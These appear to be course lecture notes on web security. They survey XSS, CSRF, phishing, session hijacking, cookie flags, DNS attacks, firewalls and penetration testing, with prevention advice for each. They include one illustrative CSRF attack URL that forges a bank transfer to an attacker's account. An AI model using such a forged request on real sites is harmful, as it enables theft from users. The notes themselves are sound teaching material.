MOD 6 CSS

Web security
Web security focuses on protecting online information and systems from
unauthorized access, use, disclosure, disruption, modification, or destruction. It
involves various techniques and technologies to prevent attacks, maintain data
integrity, and ensure user privacy.

Key Concepts
•Confidentiality: Protecting sensitive information from unauthorized
disclosure.
•Integrity: Ensuring the accuracy and reliability of data.
•Availability: Maintaining the accessibility of systems and resources.

Common Web Security Threats:

1. Cross-Site Scripting (XSS):
Attackers inject malicious scripts into web pages viewed by users.
2. SQL Injection:
Attackers manipulate database queries to gain unauthorized access.
3. Cross-Site Request Forgery (CSRF):
Forces users to perform unwanted actions on web apps in which they're
authenticated.
4. Man-in-the-Middle (MitM) Attacks:
Interception of communication between client and server.
5. Clickjacking:
Trick users into clicking on something different from what they perceive.
6. Phishing:
Tricking users into providing sensitive information via fake web pages.
7. Session Hijacking:
Attacker takes over a valid session using stolen cookies or session IDs.
 🔐 Principles of Secure Web Application Design (Short Version)
1. Input Validation & Sanitization
Ensure all user inputs are clean and safe to prevent attacks like SQL
injection and XSS.
2. Least Privilege
Give users and components only the access they need—nothing more.
3. Secure Coding
Follow best practices like avoiding hardcoded secrets, handling errors
safely, and using trusted libraries.
4. Regular Testing
Perform frequent security tests (e.g., code reviews, scans, penetration
tests) to catch and fix vulnerabilities early.

User Authentication Methods and Best Practices:

1. Password-Based Authentication
This is the most common method where users log in using a username
and password. To improve security, users should create strong, unique
passwords, and systems must store them securely using hashing
algorithms like bcrypt.
2. Two-Factor Authentication (2FA)
2FA adds an extra layer of security by requiring two types of credentials
—typically something the user knows (a password) and something they
have (like a code sent to their phone). It significantly reduces the risk of
unauthorized access.
3. Biometric Authentication
This method uses physical traits such as fingerprints, facial recognition,
or iris scans to verify identity. It's convenient and difficult to replicate,
but must be implemented securely to protect stored biometric data.
4. Security Token Authentication
Authentication tokens—either physical devices or virtual apps—generate
time-based or event-based one-time codes. These tokens enhance
security, especially when used with passwords or in high-risk
environments.
Role of Cookies in Web Security
Cookies are small pieces of data stored in the user's browser, primarily used for
session management, personalization, and user tracking. They help websites
remember user activities and preferences, such as login states or language
settings. While cookies enhance user experience, they can also introduce
significant security risks if not properly managed.

Types of Cookies
1. Session Cookies
These are temporary cookies that are deleted once the browser is
closed. They are typically used for managing user sessions during active
browsing.
2. Persistent Cookies
These cookies remain stored on the user's device until they expire or are
manually deleted. They are often used to remember login credentials or
user preferences.
3. Secure Cookies
These cookies are transmitted only over HTTPS connections, ensuring
that the data is encrypted during transfer and protected from
eavesdropping.
4. HttpOnly Cookies
These cookies are inaccessible to JavaScript, which helps protect them
from being stolen via Cross-Site Scripting (XSS) attacks.
5. SameSite Cookies
These restrict cookies from being sent on cross-site requests, thereby
providing protection against Cross-Site Request Forgery (CSRF) attacks.

Security Roles of Cookies

Cookies play an important role in several security-related aspects of web
applications:
Function Role of Cookies
Session Maintain user login state and track sessions across
Function Role of Cookies
Management multiple pages.
Store tokens or session IDs to identify and authenticate
Authentication
users.
Save user preferences and settings for a customized
Personalization
browsing experience.
Security Use flags like Secure, HttpOnly, and SameSite to protect
Enhancements against common web attacks.

Security requirements of website

1. Confidentiality
 Data Encryption: Sensitive data, such as login credentials, credit card
details, and personal information, should be encrypted both during
transmission (using protocols like HTTPS) and at rest (using proper
encryption algorithms).
 Access Control: Only authorized users should be allowed to access
sensitive information. This can be enforced through authentication
mechanisms such as passwords, two-factor authentication (2FA), and
role-based access control (RBAC).
2. Integrity
 Data Integrity: Ensure that data is not tampered with or modified
without proper authorization. This can be ensured by using hashing,
digital signatures, and integrity checks like HMAC (Hash-based Message
Authentication Code).
 Input Validation: Validate and sanitize all user inputs to prevent
malicious data from altering the server’s behavior or database integrity
(e.g., SQL injection, Cross-Site Scripting (XSS)).
3. Availability
  DDoS Protection: Implement measures such as load balancing, rate
limiting, and firewalls to protect the website from Distributed Denial-of-
Service (DDoS) attacks that could overwhelm the server.
 Backup Systems: Regular backups and redundant server setups (such as
failover systems) should be in place to recover from attacks or server
failures quickly.
4. Authentication & Authorization
 Strong Authentication: Use strong, multi-factor authentication (MFA)
mechanisms, especially for critical or sensitive areas of the website.
 Authorization Checks: Implement fine-grained authorization policies to
ensure users can only access resources they are permitted to. This may
involve different levels of user roles (admin, user, guest) and access
restrictions.
5. Non-Repudiation
 Logging and Monitoring: Maintain detailed logs of user activities, system
events, and security-related events (such as failed login attempts). This
ensures that actions can be traced and that users cannot deny their
actions.
 Audit Trails: Keep a record of changes made to sensitive data, system
configurations, and important transactions, making it impossible for
users or administrators to deny their actions.

6. Accountability
 User and Admin Monitoring: Monitor user activity and administrative
actions to detect unauthorized access or abnormal behavior patterns.
Tools like intrusion detection systems (IDS) and user behavior analytics
(UBA) can be used.
 Role-Based Access Control (RBAC): Ensure that users only have access to
what they need to perform their job functions, minimizing the potential
damage of compromised accounts.
7. Privacy
  Data Minimization: Only collect necessary information from users. Avoid
storing sensitive information like passwords or credit card numbers
unless absolutely necessary, and make sure it is encrypted if stored.
 Privacy Policies: Clearly communicate how user data is being used,
stored, and protected through privacy policies and compliance with
privacy regulations such as GDPR.
8. Vulnerability Management
 Patch Management: Keep software, including web servers, application
frameworks, and third-party libraries, up to date with the latest security
patches.
 Regular Vulnerability Scanning: Perform regular security assessments,
including vulnerability scans and penetration testing, to identify and fix
potential weaknesses.
9. Secure Coding Practices
 Code Reviews: Conduct code reviews to ensure that security
vulnerabilities are identified and resolved early in the development
process.
 Sanitize Inputs: Always sanitize user input to avoid injection attacks like
SQL injection, XSS, and Cross-Site Request Forgery (CSRF).

Aspect HTTP HTTPS

HyperText Transfer Protocol
Full Form HyperText Transfer Protocol
Secure
Not secure, data is transferred Secure, uses encryption to
Security
in plain text protect data
Data is encrypted using
Encryption No encryption
SSL/TLS
Port Uses port 80 Uses port 443
Relies on HTTP over SSL/TLS
Protocol Relies on plain HTTP protocol
encryption
Aspect HTTP HTTPS
Uses SSL/TLS to ensure data
SSL/TLS Does not use SSL/TLS
privacy and integrity
Data can be tampered with in Ensures data integrity and
Data Integrity
transit prevents tampering
Verifies the server’s identity
Authentication No authentication of the server
through SSL certificates
Faster due to lack of Slightly slower due to the
Performance
encryption overhead encryption process
Used for non-sensitive, public Used for secure transactions
Use Cases data (e.g., blogs, informational (e.g., online banking, e-
websites) commerce sites)
URL Prefix Begins with http:// Begins with https://
Provides trust with certificates
Trust No verification of authenticity issued by trusted certificate
authorities (CAs)

Web browser attacks

Web browser attacks target vulnerabilities in web browsers or their
components to compromise the user's system, steal data, or manipulate web
traffic. Here are some common web browser attacks:
1. Cross-Site Scripting (XSS)
 Description: An attacker injects malicious scripts into web pages viewed
by users, typically via input fields. These scripts are then executed in the
victim's browser.
 Impact: Can steal session cookies, hijack user sessions, deface websites,
or redirect users to malicious websites.
 Prevention: Input sanitization, Content Security Policy (CSP), and secure
coding practices.
2. Cross-Site Request Forgery (CSRF)
 Description: The attacker tricks the user into executing unwanted actions
on a website where they are authenticated, such as changing account
settings or transferring funds.
 Impact: Can perform malicious actions on behalf of the victim without
their consent.
 Prevention: Use anti-CSRF tokens, SameSite cookies, and validate the
origin of requests.
3. Phishing
 Description: The attacker impersonates a trustworthy entity via a fake
website, email, or message to steal sensitive information like usernames,
passwords, and credit card details.
 Impact: Compromised accounts and stolen personal information.
 Prevention: Awareness training, anti-phishing browser extensions, and
using secure (HTTPS) websites.
4. Man-in-the-Middle (MITM) Attack
 Description: An attacker intercepts and potentially alters
communications between the user and a website. This often occurs over
unsecured networks (e.g., public Wi-Fi).
 Impact: Data interception, session hijacking, or injecting malicious
content into the communication.
 Prevention: Use HTTPS for encrypted communication, avoid using public
Wi-Fi for sensitive activities, and employ VPNs.
5. Drive-By Downloads
 Description: Malicious software is automatically downloaded to a user's
computer when visiting a compromised or malicious website.
 Impact: Installation of malware such as viruses, Trojans, or ransomware.
 Prevention: Keep browsers and plugins up to date, use antivirus
software, and disable JavaScript in untrusted sources.
6. Clickjacking
 Description: An attacker tricks the user into clicking on something
different from what they perceive by overlaying transparent or disguised
content over a legitimate webpage.
 Impact: Can lead to unintended actions, such as liking a social media
page, downloading malicious files, or transferring funds.
 Prevention: Use the X-Frame-Options header to prevent the website
from being embedded in an iframe.

Prevention Measures for Browser Attacks:

1. Use HTTPS for secure communication.
2. Update browsers and plugins regularly to patch security flaws.
3. Install anti-malware and antivirus software to detect and block
malicious content.
4. Educate users about phishing and suspicious behavior.
5. Disable unnecessary browser features, such as Flash, Java, or
unnecessary extensions.

Clickjacking
 Definition: Clickjacking is a malicious technique where an attacker tricks
a user into clicking something different from what they perceive, by
overlaying a transparent or disguised element on a web page.
 How It Works: The attacker creates a hidden or disguised layer (like a
button or an invisible iframe) over a legitimate web page, causing the
user to unknowingly click on the malicious element. For instance, the
user may think they are clicking on a harmless button, but instead, they
are interacting with a hidden element controlled by the attacker.
 Impact: Clickjacking can lead to unintended actions, such as:
o Liking a page on social media.
o Initiating a transaction or making a payment.
 o Submitting sensitive information without the user’s knowledge.
 Prevention:
o Use the X-Frame-Options header to prevent your website from
being embedded in iframes.
o Implement a Content Security Policy (CSP) to restrict where your
website can be loaded.
o Educate users not to click on suspicious links or buttons.
Session Hijacking
 Definition: Session hijacking occurs when an attacker steals a valid
session token (such as a session cookie or authentication token) and
impersonates the user to gain unauthorized access to their session.
 How It Works: The attacker intercepts or steals the user’s session ID
(often through methods like man-in-the-middle attacks, network sniffing,
or exploiting weak session management) and uses it to take over the
user’s session. This can occur if a user’s session is transmitted over an
unsecured network (like public Wi-Fi) or if their session is not properly
protected.
 Impact: Session hijacking can lead to:
o Unauthorized access to user accounts (e.g., email, banking, social
media).
o Data theft or the ability to perform malicious actions in the name
of the user.
o Loss of trust in the website or web application.
 Prevention:
o Use HTTPS to encrypt all communications and prevent session
data from being intercepted.
o Implement Secure and HttpOnly flags on session cookies to
prevent unauthorized access via JavaScript or insecure channels.
o Regenerate session IDs after login to ensure that attackers cannot
reuse old session IDs.
 o Enable Multi-Factor Authentication (MFA) to provide an
additional layer of security beyond just the session ID.

Cross-Site Request Forgery (CSRF)

Definition:
Cross-Site Request Forgery (CSRF) is a type of attack where a malicious actor
tricks a user into performing actions on a web application that the user is
authenticated on, without the user's consent. This attack takes advantage of
the fact that browsers automatically send authentication cookies or tokens
with each request, making the user unknowingly perform actions on a site.
How it Works:
1. Victim's Session: The attacker targets a user who is already logged into a
trusted website (e.g., a banking site, email, or social media).
2. Malicious Request: The attacker crafts a malicious request (e.g.,
changing account details, transferring funds) and embeds it in a
webpage, email, or third-party site. The request is often hidden inside an
image, script, or link.
3. Victim Executes Request: When the victim visits the malicious page or
clicks on the link, their browser sends the forged request to the trusted
site, along with the user's session cookies or tokens.
4. Action Performed: Since the website cannot differentiate between a
legitimate user action and the forged one, it processes the malicious
request as if the user intentionally performed it.
Impact:
 Account Compromise: The attacker can cause the user to perform
unintended actions such as changing the account email, transferring
funds, or even deleting data.
 Loss of Funds: For websites like online banking, CSRF can lead to
unauthorized money transfers.
 User Privacy Violations: It can compromise the privacy of users by
allowing attackers to alter their settings or actions.
Example Attack:
 Imagine a banking website where a user can transfer funds using a URL
like this:
https://bank.com/transfer?amount=1000&toAccount=attackerAccount.
 If the user is logged into the banking site, an attacker could create a fake
webpage that includes an image or a form with the above URL. When
the victim visits the page, their browser will send the request to the
bank, transferring money to the attacker’s account without the user’s
consent.
Prevention:
 Anti-CSRF Tokens
 SameSite Cookies
 Request Validation
 Requiring Re-authentication
 Content Security Policy (CSP)

Phishing: Definition
Phishing is a cyber attack where an attacker attempts to deceive individuals
into revealing sensitive information such as login credentials, credit card
numbers, or other personal details. This is typically done by impersonating a
trustworthy entity through fraudulent emails, websites, or other forms of
communication.
Common Types of Phishing Techniques
1. Email Phishing
o Description: The most common type of phishing, where an
attacker sends fraudulent emails that appear to come from
legitimate sources (e.g., banks, e-commerce sites, government
agencies).
o Goal: To trick recipients into clicking on malicious links,
downloading infected attachments, or revealing sensitive
information (login credentials, credit card numbers).
 o Example: An email claiming that your bank account has been
compromised and asking you to click a link to "verify your
account."
2. Spear Phishing
o Description: A more targeted and personalized form of phishing,
where the attacker customizes the message to a specific individual
or organization, often using information gathered from social
media or public databases.
o Goal: To increase the likelihood of success by making the email
appear more credible and relevant to the target.
o Example: An email that appears to come from your boss, asking
you to urgently transfer money or share sensitive information.
3. Whaling
o Description: A type of spear phishing that specifically targets high-
level executives or important individuals (often referred to as
"whales"), such as CEOs, CFOs, and other decision-makers in a
company.
o Goal: To steal highly sensitive corporate information or gain access
to company assets.
o Example: A fraudulent email that looks like an official
communication from a legal firm or financial institution asking for
a critical business action, such as wire transfers or signing
important documents.
4. Vishing (Voice Phishing)
o Description: Phishing attacks conducted over the phone, where
attackers impersonate legitimate entities (such as banks,
government agencies, or tech support) to gain personal
information.
o Goal: To manipulate the victim into revealing information like
credit card numbers, social security numbers, or account
passwords.
 o Example: A call claiming to be from your bank’s fraud department,
asking you to verify account details to avoid suspension.
5. Smishing (SMS Phishing)
o Description: Phishing attacks that use SMS (text messages) to
deceive the recipient into clicking on a malicious link or calling a
fraudulent phone number.
o Goal: To steal personal information or install malware on the
victim’s device.
o Example: A text message claiming that you’ve won a prize, with a
link to "claim your reward," which leads to a fake website
designed to steal your login details

Pharming: Pharming is a more technical attack that aims to redirect a user's

website request to a fraudulent site without their knowledge, even if they type
the correct web address. Unlike phishing, which relies on tricking the user into
visiting a fake site, pharming manipulates the system's DNS settings or takes
advantage of vulnerabilities in internet infrastructure to lead users to malicious
sites.

 DNS Spoofing: This is a common pharming technique where the attacker

corrupts the DNS server's data to redirect users to fake websites, despite
them entering the correct URL.
 Hosts File Modification: Attackers modify the local hosts file on a user's
computer to direct web requests to malicious sites without their
knowledge.

Preventive Measures Against Phishing

1. Enable Multi-Factor Authentication (MFA) and use strong, unique
passwords.
2. Verify sender details and check links for authenticity before clicking.
3. Ensure HTTPS on websites and avoid sharing sensitive info via email.
4. Use anti-phishing tools and keep software updated.
5. Monitor accounts regularly for suspicious activity and report phishing
attempts.
For Pharming:

 Use secure DNS servers and employ DNS security extensions like DNSSEC
to prevent DNS spoofing.
 Regularly update and patch software to protect against vulnerabilities
that could be exploited in pharming attacks.

DNS Attacks: Overview

DNS (Domain Name System) attacks target the infrastructure of the DNS, which
is responsible for translating domain names (like www.example.com) into IP
addresses that computers can understand. These attacks aim to disrupt or
manipulate the resolution process to compromise network security.
Common Types of DNS Attacks
1. DNS Spoofing (Cache Poisoning)
o Description: The attacker injects false DNS records into the cache
of a DNS resolver, causing it to return incorrect IP addresses.
o Impact: Users are directed to malicious websites instead of the
intended site, leading to potential data theft or malware infection.
2. DNS Amplification Attack
o Description: A type of DDoS (Distributed Denial of Service) attack
where an attacker sends DNS queries to a DNS server with a
spoofed IP address (the victim's IP). The server then sends a large
response to the victim.
o Impact: The victim's system is overwhelmed with massive
amounts of DNS traffic, causing service disruptions or network
outages.
3. DNS Hijacking
o Description: An attacker takes control of a victim's DNS settings,
redirecting their traffic to malicious websites.
o Impact: The victim is redirected to fake websites, leading to
phishing attacks or malware infections.
 4. DNS Tunneling
o Description: Data is encoded within DNS queries and responses to
bypass network security measures, allowing attackers to send and
receive malicious data undetected.
o Impact: Allows attackers to exfiltrate data or maintain
communication with compromised systems.
5. DNS Flood Attack
o Description: A type of DDoS attack where the attacker floods a
DNS server with a high volume of DNS requests, overwhelming its
capacity.
o Impact: Causes a DNS server to become slow or unresponsive,
leading to service outages for users trying to access websites.
Preventive Measures Against DNS Attacks
1. Use DNSSEC (DNS Security Extensions): Ensures the authenticity and
integrity of DNS data.
2. Implement Rate Limiting: Prevents abuse by limiting the number of
requests from a single source.
3. Configure DNS Filtering: Blocks malicious domains and prevents access
to phishing sites.
4. Monitor DNS Traffic: Use network monitoring tools to detect unusual
DNS request patterns.
5. Keep DNS Software Updated: Ensure that your DNS servers are patched
and protected against known vulnerabilities.

Firewall
A firewall is a network security device that monitors and controls incoming and
outgoing network traffic based on predetermined security rules. It acts as a
barrier between your trusted internal network and the untrusted external
network (like the Internet). Firewalls can be hardware, software, or a
combination of both, and they help prevent unauthorized access to or from a
private network.
Importance of Firewalls
Firewalls are essential because:
1. They protect internal networks that might not be secure on their own.
2. The Internet has many potential threats, like hackers, cybercriminals, and
malicious software.
3. They help prevent denial of service attacks and unauthorized access to
internal data.
4. They centralize network security, acting like a lock on the front door of a
house.
Types of Firewalls
Firewalls are generally classified into three types:
1. Packet-Filtering Firewalls (Stateless and Stateful)
o How it works: This type of firewall filters traffic based on criteria
like source and destination IP addresses, ports, and protocols. It
examines each data packet individually to decide whether to allow
or block it.
o Stateless Firewalls: They inspect packets without keeping track of
the connection state. They make decisions based solely on the
packet's data, which makes them faster but less secure.
o Stateful Firewalls: These firewalls track the state of active
connections, allowing only packets that are part of a known
connection. They are more secure than stateless firewalls because
they understand the context of the traffic.

2. Application-Level Firewalls (Proxies)

o How it works: An application-level firewall, also known as a proxy
firewall, filters traffic based on the specific application it is
associated with (like HTTP, FTP, or Telnet). It acts as an
intermediary, preventing direct communication between a trusted
network and an untrusted network.
 o Features:
 It examines packets at the application layer, verifying the
data being sent and received.
 It can filter specific actions, like blocking certain commands
that could be harmful (e.g., blocking the 'FTP put' command
to prevent file uploads).
o Network Address Translation (NAT): It can replace the internal IP
address with its own when sending data to the outside world,
hiding internal network details.
3. Circuit-Level Firewalls
o How it works: Circuit-level firewalls operate at the transport layer
(TCP). They create a virtual connection between the internal and
external hosts and monitor the TCP handshake process to
establish that the communication is legitimate.
o SOCKS Protocol: This is a popular protocol used in circuit-level
firewalls. It creates a secure relay between the client and the
server without directly exposing the internal network.
o Key Feature: Unlike application-level firewalls, circuit-level
firewalls don't inspect the data inside the packets; they just
monitor the session state to ensure that a connection is
legitimate.

Penetration Testing
Penetration Testing, also known as Pen Testing or Ethical Hacking, is a
simulated cyberattack on a computer system, network, or application to
identify and exploit vulnerabilities before malicious hackers can.
Purpose of Penetration Testing
 Identify security weaknesses.
 Test the effectiveness of existing security measures.
 Assess compliance with security policies and regulations.
 Prevent data breaches and unauthorized access.
Types of Penetration Testing
1. Black Box Testing
o Tester has no prior knowledge of the system.
o Simulates an external attack.
2. White Box Testing
o Tester has full access to system details (source code, credentials,
etc.).
o Comprehensive analysis of internal security.
3. Gray Box Testing
o Tester has partial knowledge of the system.
o Balances realism and depth.
Phases of Penetration Testing
1. Planning and Reconnaissance
o Define scope and gather intelligence (e.g., domain names, IPs).
2. Scanning
o Identify open ports, services, and vulnerabilities using tools like
Nmap or Nessus.
3. Gaining Access
o Exploit vulnerabilities to gain control over systems.
4. Maintaining Access
o Simulate advanced persistent threats (APTs) to test long-term
presence.
5. Analysis and Reporting
o Document findings, risks, exploited vulnerabilities, and suggest
fixes.
Common Tools Used
 Nmap, Metasploit, Burp Suite, Wireshark, Nessus, Nikto, etc.